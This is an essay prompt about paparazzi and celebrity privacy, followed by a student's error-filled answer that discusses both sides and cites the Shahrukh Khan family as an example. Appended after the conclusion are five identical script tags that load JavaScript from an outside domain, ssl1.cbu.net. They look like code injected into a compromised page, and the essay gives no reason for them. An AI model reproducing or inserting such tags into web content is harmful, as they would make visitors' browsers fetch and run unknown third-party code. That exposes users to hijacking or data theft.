Write about the following topic:

Some people feel that paparazzi should not follow celebrities and invade their privacy by taking pictures of them everywhere, while others believe this is just the price of fame.

Discuss both sides and give your opinion. Give reasons for your answer, and include any relevant examples from your own knowledge or experience.

In today's world, celebrities's life is discussed on large scale and paparzzi are the one who are constantly in hunt to get a peek into famous person's life. Some people argue that paprazzi should control these activities while others say that disruption in celebrity's life is the price at which fame comes. This essay will discuss both the opinions.

Firstly, even famous personalities have a life apart from being famous. Due to paprazzi constantly monitoring and chasing them, their social life is hampered and are unable to enjoy their personal place with family or friends. This invasion of personal space creats a sense of discomfort amongst celebrity and can affect their mental health causing outbursts in an aggressive or passive way. This effect is not limited to celebrities themselves as their spouse or children are also affected by the limelight. For example, recently a famous bollywood actor Shahrukh Khan's son was caught by police with drugs. The paprazzi was continuously monitoring shahrukh and his son's activities irrespective of the struggles family was going through at the moment affecting their social and mental state.

However, certain other people argue that once you become famous there is no running away from limelight. While renowned persons enjoy the fame they have to be open to this inflitration by paprazzi at some level. Once a person becomes a center of attraction, people start discussing about their life and to provide people with a comprehensive understanding about personality or activities, paparazzi regularly follow them. Famous people need to be comfortable with this upto certain level as it was their decision to gain fame.

To conclude, there needs to be basic understanding amongst paparazzi to not affect the personal space of celebrities. The celebrities should be given some space to enjoy their social life and paprazzi needs to understand their limits and not follow them regularly. <script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>